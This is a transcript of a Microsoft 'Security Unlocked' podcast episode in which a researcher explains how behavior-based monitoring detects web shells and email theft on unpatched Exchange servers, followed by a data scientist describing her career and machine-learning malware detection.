Security Unlocked 10.14.20
Ep 3 | 10.14.20

Protecting the Under-Secured With Bad Behavior

Transcript

Nic Fillingham: Hello and welcome to Security Unlocked, a new podcast from Microsoft, where we unlock insights from the latest in news and research from across Microsoft's security engineering and operations teams. I'm Nic Fillingham.

Natalia Godyla: And I'm Natalia Godyla. In each episode, we'll discuss the latest stories from Microsoft security. Deep dive into the newest by Intel, research, and data science.

Nic Fillingham: And we'll follow some of the fascinating people working on artificial intelligence in Microsoft security. If you enjoy the podcast, have a request for a topic you'd like covered, or have some feedback on how we can make the podcast better.

Natalia Godyla: Please contact us at securityunlocked@microsoft.com, or via Microsoft security on Twitter. We'd love to hear from you.

Nic Fillingham: Hello listeners, welcome to the third episode of Security Unlocked. And hello to you, Natalia. It is October. The leaves are turning. It is the time of year of candy corn and high fructose corn syrup. I know you love October.

Natalia Godyla: I do. I am all in for pumpkin spice lattes and cyber security awareness month.

Nic Fillingham: A match made in heaven. If they reformed the Spice Girls, you should audition to be the sixth girl called Pumpkin Spice.

Natalia Godyla: Two out of 10 on that joke.

Nic Fillingham: Two out of 10? I thought it was pretty good. Anyway. Cyber security awareness month, is that a Microsoft thing? Is that an industry thing? What's all that about?

Natalia Godyla: It's an industry thing, but Microsoft is definitely invested in doing their part during this month. So it's really exciting to see everyone empowering the cyber security world to get the word out, which is what we do on this podcast too.

Nic Fillingham: Exactly right. I was just going to say, Security Unlocked, the podcast. Every episode we're about helping spread the word of the importance of cyber security and helping empowering our listeners with more information about how all this stuff works.

Natalia Godyla: Yeah. I'm excited for this episode. We've got a great lineup.

Nic Fillingham: First up, we talk to Hardik Suri on the importance of keeping servers up-to-date. But more importantly, or more specifically, how he and his team are working on behavior based monitoring to protect, what's referred to sometimes as, under-secured or under-protect servers.

Natalia Godyla: Yeah. And we talk to Dr. Karen Lavi about her background and how she came to cyber security through a really interesting journey. She's been a medic. She's been in the Israeli Defense Forces. All with the intent of just doing good, and she'll talk to us about her perceptions of AI and how neuroscience and the rest of her background connect to cyber security.

Nic Fillingham: It is a great conversation. It's a great episode. I hope you'll enjoy it. Let's get on with the pod.

Nic Fillingham: Hardik Suri, welcome to the Security Unlocked Podcast. Thanks for joining us.

Hardik Suri: Thank you for having me.

Nic Fillingham: Could you start by just introducing yourself, telling us about your role at Microsoft, and what you do day-to-day?

Hardik Suri: Sure. I work as a senior security research with the Microsoft Defender ATP research team. I'm currently based in Vancouver and my daily responsibilities is getting up to speed on all the latest threats which are out there, and just checking which ones are impacting Microsoft products. And if they are, how to be durably detect and protect these latest advanced attacks. Anything which touches the endpoints would be under our radar. It could be explorers, it could be malware, it could be an email with an attachment. When the user clicks, it downloads itself and does all those funny things. So any suspicious or malicious activities happening on the endpoint we get visibility as the product, and then we try to see how we can detect that part and prevent that from abusing a lot more.

Natalia Godyla: So your research process starts with the signals coming from the product? And then, when you find something that is suspicious or interesting that is your jumping off point to dig in further?

Hardik Suri: Mm-hmm (affirmative). There are two ways. Either we proactively go and find things and then we come back and see if we've got something in telemetry. Or if telemetry can give us something interesting, and then from there we can pivot and find what really happened.

Nic Fillingham: Hardik, you authored a blog post in June called Defending Exchange Servers Under Attack, which we'd love to talk about. Could you walk us through what you discovered and how you addressed it in this June 24 blog?

Hardik Suri: How it all started was we had telemetry on a piece of code called web shells on these exchange servers. Web shells are nothing but they are a comparatively small piece of code which attackers can install on these servers and then can control the exchange server, in terms of running commands, or dropping more binaries, or moving laterally. So that piece of code on the servers is critical to the attacker. And if you find any instance of that piece of code, we know that the server is already compromised and the attacker is already operating on that server. That was the starting point, and then when we look at the server in detail, we could see what all actions the attacker did.

Hardik Suri: Whether it was doing reconnaissance activity that is trying to enumerate all the entire organization and the users and finding which critical accounts he should target, or is it like dumping credentials, like if we can get credentials, we can move laterally on the organization and impact or infect more machines. So that was the starting point where we see a web shell installation. That's alarming a lot for us, and then we would deep dive and see what all the attacker did.

Natalia Godyla: Were there challenges in detecting this threat?

Hardik Suri: Yes. It's not your typical endpoint infection. When we say these servers getting compromised, these servers already have a lot of embed tools which attackers can abuse. So they don't really have to bring their own tools, which can be easily detected. But if they're already using existing tools and scripts, which are used by admins, then the traditional problem comes where how do you detect if this is an activity done by an admin of the server or is it an attacker doing the activity?

Hardik Suri: So the whole challenge was to separate out the clean, or the noise, and just focus on the malicious part, which the attacker did.

Nic Fillingham: I wanted to ask about web shells. You talked about it being relatively small pieces of code. Let's just explain that a little bit. A web shell is a piece of code that exposes the shell of the system to the web, is that accurate?

Hardik Suri: Yes. How this works is a web shell is nothing but a small piece of code which exposes functionality to execute code on the endpoint. So how you would install a web shell would be these exchange servers have folders which are accessible over the internet. So if you can install that piece of drop, that piece of script there, and visit that URL, you can control that script, and you can pass the command you want to execute as HTTP, URL or it could part of the code keys or any HTTP section. And internally, the listening script would get that piece and then execute it on the behalf of the server. So how a process tree looks is the exchange server, the instance of the exchange server, is actually executing these commands on behalf of the attacker.

Natalia Godyla: How are we evolving our techniques for detecting and blocking, especially when it comes to evasive technologies, like web shells to evade the file based protections?

Hardik Suri: File based protections would not be durable, a longterm solution for this. So what we did was we started profiling the behavior activity of these exchange servers. And understanding clean activities, or clean behaviors you would see in an exchange server, which helped us in eliminating the noise we were seeing in these attacks. So Microsoft Defender has this powerful behavior competence where it can inspect the behaviors initiating from these exchanges processes. And then we can see what kind of activities these are doing.

Hardik Suri: And based on that, we can, with some confidence, say if it's trying to spawn. Let me give you an example. If an exchange server is trying to spawn CMD.EXE, or MSHDA, or these known suspicious system files, then it's highly likely that it's been compromised and there's a web shell on the server.

Nic Fillingham: And are these behavior detections, are they rule based, or are they a bit more dynamic? Are they taking into account other factors and maybe more machine learning based determinations?

Hardik Suri: Mm-hmm (affirmative). Yeah. They are very generic in nature. And we do take input from machine learnings. All these behavior patterns, they're getting fed into the cloud behavior machine learning models. And what that helps us is the machine learning model can then provide blockings advisors to these endpoints, where even if the endpoint behavior competence is missing something, the machine learning can cache that based on its intelligence, and still block the attacks.

Hardik Suri: We have this pattern technology, where we have these behavior patterns which we just collected from the endpoint, and it's getting fed to the machine learning. And the machine learning is getting more intelligent and can actually block future attacks.

Natalia Godyla: What do you recommend security practitioners do in order to protect against the exchange server attacks?

Hardik Suri: Sure, yeah. The first thing, the most common one is to apply patches. Since these machines are very critical to the business, so it's a common saying that if exchange server goes down, the business goes down. So applying later security patches is the top priority the admin should take. The reason for this is that we are finding

Hardik Suri: ... A lot of exploits vulnerabilities in exchange servers which can be exploited and which can allow the attackers to land on these exchange servers directly, which is a game over for the organization. So, being proactive in applying patches is certainly the topmost. Second, keeping the security solutions up to date. So, don't turn off your antiviruses, your firewalls, your network protections, keep them on and keep them updated.

Hardik Suri: There has been a myth where the admins would disable the security products so that they don't really interfere with the critical workings. But what is required here is a more intelligent understanding of what settings to turn on and what settings to not turn on if they are actually interfering. So, just out-rightly turning off the security solutions is not recommended and would open the door for more exploitations. And restrict access and follow something called principle of least privilege with credential hygiene. So, keep all privileges to the lowest and the ones which are really required, keep them at certain privileges. Avoid using highly critical credentials across machines.

Hardik Suri: And finally, prioritize alerts, I'll say. Since all the organizations have some sort of central logging capabilities where they can see all the alerts coming in, any alert from the server should be considered a high priority and should be investigated thoroughly. This would help in limiting the impact because from my experience, the time the attackers come into the system, they would spend days on just doing reconnaissance on the systems. They would not jump on executing things. They would just be there and enumerate the users and try to understand the environment. That would take days and if we can identify and detect and block them at that stage, that would really limit the harm they can cause.

Nic Fillingham: So, moving forward is some of the work that you've done here and you talk about in this blog, is that actually going to help customers that have exchange servers where they may not have both of these things where they haven't applied the latest security updates or they have turned off or greatly minimized some of the security features, is some of this behavior monitoring, that you talk about in this blog, is that an additional layer of protection?

Hardik Suri: Oh yes. That's an additional layer I'll say. And a more durable layer. The attacks on exchange servers are very different from attacks on Endpoint where you would not see the attackers bringing their own malicious binaries, which would get detected by this antivirus office. They will generally rely on the tools which are already there on these exchange servers.

Hardik Suri: For example, if they land on exchange servers, one of the things they would want to do is dump the emails, because the servers are known for containing all the organization emails. For dumping and ex-filtrating these emails, they don't really have to bring any tool of their own. There are commands already installed on these servers where they can just run them and get all the emails.

Hardik Suri: So, while the file-based or the traditional antivirus solutions may not detect these attempts. The behavior components can surely detect this where you would see email getting dumped and then getting zipped and then getting ex-filtrated. All these different events we can correlate together and then piece a picture together where this could potentially be an ex-filtration of corporate emails. So, that adds a lot of value and a lot of protection.

Natalia Godyla: And what's next for the behavior-based blocking? I recall in the blog, you had outlined that there are ways in which the threat actors are starting to evade our detections. So, one example that you gave was Mimi Cats. Mimi Cats could be blocked, but there's a different way that they could leverage Mimi Cats or wrap the program in order to get past our detections again. So, I'm sure it's like a cat and mouse game where you're continuing to evolve the product while they're continuing to evolve their techniques. So, what's next?

Hardik Suri: Doing more investment on these servers is something in the pipeline. Like you rightly mentioned, attackers would always play a cat and mouse game with files where we would detect something and they would modify that and then we stop detecting that. That's where the behavior component is so important. The cost of changing a behavior is much more. Behavior translates to a technique. So, the effort to create or use a new technique by an attacker, the cost of that is much more than simply wrapping a binary or adding some or removing some bites, where it's the protection. So, the whole point is to how to increase the cost on an attacker to execute an attack. And while we sit in a more generic layer where they might evade file-based detections, but for them to really evade us completely, they have to create a new attack from scratch, which we have seen that the attackers won't do. They would generally want to reuse whatever they have created on different organizations.

Hardik Suri: So, the behavior component will always be a much more durable way of protecting customers, I'll say.

Nic Fillingham: Hardik, was there an ah-ha moment for you and or your colleagues when you were going through this process? Did a particular piece of data or telemetry allow you to see the big picture in a dramatic way or was it a slow drip?

Hardik Suri: Well, it was a slow drip I'll say, because the attackers like I said, it's not a typical Endpoint detection where the whole detection is over in a few seconds or minutes. These attackers are in your organization for weeks and months before they start doing anything malicious. So, we need to be patient and we need to be watching them all the time and lay traps for them, if they do something, we get telemetry and we block them outright.

Hardik Suri: Well, the ah-ha moment was when they were trying to abuse this thing called Exchange Management Shell. That's a very critical piece of platform, which the admins use to maintain the exchange servers, and a few of the actions could be exporting mailbox emails or migrating them. While we could see the attackers doing your typical activity of reconnaissance and that credential dumping. The moment we saw the attackers going after the Exchange Management Shell, and trying to dump the emails, that was the point we could really understand the motive of the attackers and we could also see what kind of emails they were looking for. They were searching for specific subjects. They were searching for certain strings in the body. So, we could really understand the mindset of the attackers and what they were actually after.

Natalia Godyla: So, what was the end result of the attacks then? So, they ex-filtrated credentials as a result, what did they do with them?

Hardik Suri: So, they were really after the corporate data or the content in those emails and they were trying all their effort to how they can dump and ex-filtrate this part because the exchange servers would contain all the critical information and emails would be one of them. We did see them moving to other machines where they could find more information, but if we keep focused on the exchange servers, the emails were what they were after.

Natalia Godyla: Was this with the goal of selling this data or compiling a large dataset to use for other malicious intent?

Hardik Suri: These are really advanced attackers. So, these attackers would generally use this kind of information to gain more information on the organization. It could be your typical corporate espionage cases or IP theft cases where they would want to collect all the IP, Intellectual Properties of an organization. We are not sure at this point how they use that data, but that seemed like the intention based on the strings they were searching inside the emails.

Nic Fillingham: The behavior modeling that's happening on the Exchange Server and then the machine learning that's up in the Cloud, can any of those learnings, those behaviors, that learning, can that flow into other models to help protect other servers that are open to the web? I'm wondering if some of the work you've done here is going to filter out and benefit other products and services?

Hardik Suri: Oh yeah. Certainly. So, the ML model is quite generic and it doesn't really serve exchange servers only. It provides protection for all the endpoints. So, if we detect something on one endpoint and that same technique is used on exchange servers, if the Cloud already has that information, it could have out rightly blocked that.

Hardik Suri: So, it kind of collects everything and doesn't really differentiate between what endpoint that is. And malicious is malicious, it doesn't really matter if it's on an exchange server or an Endpoint.

Nic Fillingham: Hardik, what do you do when you're not a security researcher? What do you do for fun?

Hardik Suri: So, I'm a musician. I play the guitar. Back home I had a rock band, which I was part of. So yeah, music, I'll say.

Nic Fillingham: What kind of music did you play? You said a rock band but who would you align yourself with musically?

Hardik Suri: So, we were a rock band and my influencers would be your typical classic rock, Led Zeppelin, Deep Purple. In modern rock, I'll say Tool and Dream Theater. Progressive stuff, I like that.

Nic Fillingham: What was the name of your band?

Hardik Suri: It was called Twisted Flyover. It was named after a flyover. So, when my workers used to come to my place, he had to cross a flyover and that flyover had a lot of circles, so he was kind of confused, there were different exits. So, he always used to take the wrong exit and he just once said, "Man, this flyover is so twisted," and that's how we came up with the name.

Nic Fillingham: Nice, and it's not an homage

Nic Fillingham: And it's not an homage to Twisted Sister?

Hardik Suri: Oh no, it's not.

Nic Fillingham: Awesome. Well, Hardik, thank you so much for your time. Thanks for doing great work. We look forward to more updates from you on the security blog in the future.

Hardik Suri: Thank you. Thank you for having me. I had a good time

Natalia Godyla: And now let's meet an expert in the Microsoft security team to learn more about the diverse backgrounds and experiences of the humans creating AI and tech at Microsoft.

Natalia Godyla: Hi, Karen, welcome to the show.

Dr. Karen Lavi: Hey, thanks for having me.

Natalia Godyla: Well, we're going to kick it off by just setting the stage a bit. It would be great to hear what's your current role at Microsoft and what does your day to day look like?

Dr. Karen Lavi: I am a senior data science lead in Microsoft defender research group. I'm part of the cyber side team, which is cyber security AI, which means that our team is consisting of researchers and data scientists that work trying to tackle problems related to security and protect our customers using the muscle of machine learning and data science.

Natalia Godyla: Could you talk a little bit more about the makeup of the teams? How many people are on the team? What kind of backgrounds do they have?

Dr. Karen Lavi: So my team is currently five people, including myself. Were coming from completely different backgrounds and actually completely different nationalities as well, which is pretty nice because each one of us brings something very different culturally and technically to the team. We have someone with the background of robotics, to someone that was in the Navy, working on sonars, someone with statistics background and someone that has been for many, many years in Microsoft on different roles. So brings all the aspects of the business into it.

Nic Fillingham: And Karen, how about your path to Microsoft? How did you get to Microsoft? What interesting entries would we see on your LinkedIn profile?

Dr. Karen Lavi: So I think that you could look at my LinkedIn profile, you wouldn't understand, first of all, what I am, and second where I'm from, because there are so many different entries. So I'm a data scientist, a programmer, a security consultant, a neuroscientists, a medic and coaching girls to code. So I think those are the main things that you would see on my LinkedIn. I joined Microsoft two years ago. Me joining Microsoft was after the returning back to the security field after a few years in academia. Before I was in Microsoft in this role, I was a data scientist in academia, that was after I did my PhD in computation on neuroscience in Switzerland, so moving also States and the countries and roles. Before I was doing my PhD in neuroscience, I was in the security field, I was in day Israeli Defense Forces, I was a pen tester. At that time, I was also doing my BA in psychology. And before that I was volunteering as a medic also during this time. So quite a way until I got here today.

Nic Fillingham: That's a fascinating resume. How did you find yourself going from the sort of paramedic world, into psychology, into neuroscience and then here to Microsoft in AI. Was there a catalyst that spurred each of those changes or was it sort of organic?

Dr. Karen Lavi: I think the main thing that is associated with all of those different things that I did is my burning need to impact as many people as possible and to help people, and every time it's coming from a different aspect. From the beginning, it was from the medical aspect and then protecting applications against bad actors. And then I wanted to do research and help in combining the medic plus the data, but then academia didn't give me exactly what I wanted because it was indeed helping mankind with progressing science, but I wanted to see the impact of what I'm doing. And that's what I found in Microsoft, which is using my computational skills with protecting our customers against bad actors.

Nic Fillingham: You just mentioned taking the sort of medic part and marrying that with data. Can you expand a bit on what that means?

Dr. Karen Lavi: Actually, it's very interesting because in what we're doing, and that's the reason that we're using AI and machine learning, is that we're trying to protect in the security world from patient zero. So when someone is getting hit by malware, it's very easy to then, once you know it to block it. But we need to use AI in order to predict it and protect it before we even know that this is malware, to be able to generalize it before we've ever seen it, and to protect the first person that is going to potentially be attacked by this malware.

Nic Fillingham: And that's patient zero.

Dr. Karen Lavi: And that's our patient zero. So it's like predicting that this disease is going to come or that this disease is going to affect that person before it's actually happening.

Dr. Karen Lavi: So besides the fact that being a medic and wanting to protect patients, this is very similar to us, so protecting our customers against malware, there are also some similarities when I was working from the other side of the medic, helping the medics and the firefighters to know to which cases to send ambulances. So there is very limited resources in each city of the ambulances that can be provided to incidents. And when someone is calling 911, that decision of whether to send an ambulance or not, that decision is very crucial because if you're not sending it, then the person might not get the treatment that they need. But if you are sending it to something that they may not have needed it actually for you to come, then you're wasting your resource.

Dr. Karen Lavi: In my previous role, in the data science for social good, we built a machine learning model that was trying to predict in real time, whether an incident will require an ambulance or not.

Dr. Karen Lavi: So something similar we have done recently in my team where we have for our enterprises, the product that we give them is producing alerts, and they need to respond to those alerts. The security operator is sitting there and seeing go to those alerts. Now, some of those things, we might give them the alert, but it's not as crucial. And if we waste their time looking at it and trying to understand what it is, they might then not invest the time in something else that is more important. We know what is the amount of time that they have and we are trying to prioritize to which alerts they should give the attention to.

Natalia Godyla: So what other experiences do you bring from your history to this current role? I know we talked a little bit about your experiences as a medic, but you also have that interesting diversion into computation and neuroscience. So how does that play into your current role today?

Dr. Karen Lavi: So besides the fact that my computation on neuroscience, I learned a lot of neural networks and machine learning, which is all of the models that can be transferred and also used in order to classify between malware and clean files, I think that the main thing is that the neuroscience is an interdisciplinary field, and the same is security. Security is a huge umbrella of all those sub topics. And the same way that there is no specialty of neuroscience, each one is coming with a different toolkit that they're trying to investigate a common problem, that's what I do in my team. My team is consisting of different backgrounds, and each one is coming with their specialty. We have someone that is an expert in statistics, someone that is an expert in security, someone that is an expert in reverse engineering, someone that is expert in reinforcement learning. And we're all bringing our toolkits together with us to solve together that big problem that we're facing. That if we will just come with one approach, we might miss all of those other opportunities that we have to solve the problem. But together, it's like a non-linear summation of our powers together.

Natalia Godyla: If you are looking at each individual bringing a specific toolkit to the team, do you normally sit back and think, okay, well, I definitely need an expert in, like you said, statistics or an expert in a specific model and then you look to build a team based on filling all of those gaps across the individuals?

Dr. Karen Lavi: That's an amazing question because this is actually something that is very dear to my heart. I believe that diversity is not just in the regular way that we define diversity, which is bringing more females, different ethnicities. It's also about the different backgrounds. And the thing that I am looking for the most when I'm looking to add someone new to the team, I sometimes would not know how to define it because the biggest problem is to know what you don't know.

Dr. Karen Lavi: So what I'm looking for is someone that is just surprising me, someone that is thinking differently than me. And I'll give you an example. I had interviewed someone and asked them to solve a problem that they give to everyone. And the way that he solved that problem was something that I did not understand so I hired him because if I don't understand it, and that's something that he understands, that's a unique talent that we can bring to our team, a unique approach that we don't have until now. And bringing something that is looking at it from a different point of view, is better than bringing someone that thinks exactly like us. And this is actually a bias that when we are talking about hiring, that one should be really careful from just recruiting mini me's, other people that would do exactly the way what I'm doing, because then we're not going to be able to actually scale and expand. We're just going to solve the exact same way.

Natalia Godyla: That's awesome. I love the way you think about innovation consistently, having it on mind. Just sticking with the philosophical level of questioning, when we talk about AI and ML and how you use it in your current role, what does AI and ML mean to you in general, in the big meta sense?

Dr. Karen Lavi: The one thing that it's really important for me that whenever I talk to someone that is not an expert in AI and ML,

Dr. Karen Lavi: Is to explain that this is not magic. It's not going to solve a problem that is not solvable. But what it can do, it can just take our domain expertise and be able to scale it to a way that a human by itself can not do, and that's the computational power. So I'll give you an example. When we were talking about the anti-Malware product defender, the one that I'm working on, and we want to be able to identify Malware, we need to predict. For me that means to predict when we are now seeing something for the first time if this is going to be a Malware file or not.

Dr. Karen Lavi: And AI and ML for me is taking all of our knowledge all over the main expertise from before and all of the samples that we have gathered through the years and understanding whether the attributes that are associating this with Malware and whether the attributes that are not, and building something that is able to learn from that past experience and be able to predict when it first seeing something completely new, if this is Malware or not.

Dr. Karen Lavi: If we had someone that had a super mind and remembered everything and was able to access it in femtoseconds, then that person for me would be an AI. But because that ability is not existing for us yet, we have to use computers for it, and that's what Machine Learning and AI is doing for us. It's making us pass that gap that our brain cannot do.

Natalia Godyla: Yeah, until we have the magic pill for it, right?

Dr. Karen Lavi: Yeah.

Nic Fillingham: Karen you mentioned AI and ML and we've used that term as well in sort of posing these questions to you. They're very broad, they're very amorphous. What are some of the techniques that your team utilize or are developing?

Nic Fillingham: We hear about Neural Networks and Deep Learning and fuzzing and all these other I think more specific sort of concepts. And they're probably... One's probably a subset of the other, but what do you find are some of the most useful techniques that you find that your team utilize in the work that you do?

Dr. Karen Lavi: A lot of the things that we are using because it has to be in an online and it has to be very fast. Currently the computational power is not allowing us to do all of those Deep Learning methods. So when we're talking about those snap decisions, that has to be more of like soft models, like random forests and linear classifiers. This is for all of our online decision making.

Dr. Karen Lavi: So, mainly the tools that we're using are those ML classifiers for classification, we're also using a lot of clustering and a lot of unsupervised methods in the backend to understand, for example, that a new version of file Polymorphic Malware, which means that it's like a file that they just change a bit in it. It's still the same Malware, but they just try to trick us. So we're all the time trying to use new techniques and bringing from academia back to our product, new techniques in order, because it is a game that we're playing with the bad actors. They're trying to find new ways to trick us, and we're trying to find new ways to understand that what they're sending is Malware. So we have to innovate and be on top of our game all the time. So the methods are changing all the time.

Dr. Karen Lavi: But the one thing that is super important is our ability to understand our data, to see trends, to identify anomalies. That's something that the big data and data science is allowing us and is really important in this case.

Nic Fillingham: What are some of the time, sort of constraints that you work with?

Nic Fillingham: I mean, so let's say I'm working at my PC and I get an email with a file attached to it and I go to double click it and the Defender service somehow looks at that file and I guess sends some metadata up into the Cloud and it comes back with a determination. I mean, that's happening in a blink of an eye, is it two blinks of an eye? What's the... This is a very short period of time that you're doing a lot of extremely complex stuff. How do you think about that? Are you working in nanoseconds, microseconds, milliseconds?

Dr. Karen Lavi: So, that's a great thing. There are a lot of very cutting edge AI and ML technologies that are just currently taking too much time because their hardware is not advanced enough, and we cannot allow ourselves to use it in an online situation because we're talking here about prediction. When you're downloading a file, if it's going to take us now a minute to give you an answer back if this is Malware or benign, you're not going to use our product. It's just going to be too much disturbance to you and it would just not be acceptable and you would rather pay the price of being attacked with a Malware once a year.

Dr. Karen Lavi: So our answer has to come really fast and it's a matter of milliseconds for us, which means that we have to make a snap judgment on the client and if we cannot make it, we need to send some of metadata to the Cloud and then bring back the answer because we lock the file at that moment, and you cannot work. So it has to be milliseconds. And that's like again going to the medic like you want to take care of patient zero, but you also don't want to do any harm, and doing harm in this case is distracting the customers.

Nic Fillingham: Cool. What are you excited about? What's sort of coming down the pipe that is a tool or a technique or just an advancement in infrastructure that you think is going to allow you and your team to do so much more?

Dr. Karen Lavi: I think one thing that we're excited about and we're currently building for our enterprise customers is the ability to help them, not just in the specific protection with the anti-Malware product, but overall in the organization. Learn their organization, use the tools of AI and ML that we know how to use and help them to understand what is needed for their specific org. So, that's something that we are currently working on and I'm very excited about that because I think that a lot of struggles that we've been hearing customers is like, "Awesome. You have this amazing new feature, but how do I know how much impact it will bring? And would it cause any harm to my employees?" And we are able to provide those answers to them and help them to configure it in an automatic way.

Dr. Karen Lavi: I think one of the best analogies that we're using now is the self-driving car. We are learning how to drive the car for them and helping them to drive the car. They are now doing it and they're doing it pretty good, but there are sometimes unexpected things. We are able to predict those unexpected things and respond in a faster way because it's a machine and not a human, and we can provide that help to our customers.

Natalia Godyla: So Karen, it looks like you've done it all. Are you done with the journey now or is there something after this? What's the next big passion?

Dr. Karen Lavi: I think that we're just scratching the surface of what we can do specifically with AI and Machine Learning and Security. There is so much more that we can help our customers and help them to take the wheel away from them and help them to drive the car instead of just giving them the wheel. And that's what I'm excited about for the future, to dive more into that and bring more of those new capabilities to our customers.

Natalia Godyla: Is there anything in AI that you're really excited about for the future?

Dr. Karen Lavi: Well, there is something that I'm really looking forward that would be developed, which is our ability to build an AI that would replicate ourself. That I would be able to have a lot of mini Karens that would go to all of my meetings and write all the emails that I need to do so I can have time to do other stuff.

Natalia Godyla: Time to save the world a little bit more.

Nic Fillingham: Karen minions. And they all report back to you at the end of the day with all their progress. All right, well on that note, Dr. Karen Lavi, thank you so much for your time. It'll be great to talk to you again in the future about more things, AI, ML, and Security.

Dr. Karen Lavi: Thank you so much for inviting me.

Natalia Godyla: Well, we had a great time unlocking insights into Security from research to Artificial intelligence. Keep an eye out for our next episode.

Nic Fillingham: And don't forget to tweet us at msftsecurity or email us at securityunlocked@microsoft.com with topics you'd like to hear on our future episode. Until then, stay safe.

Natalia Godyla: Stay secure.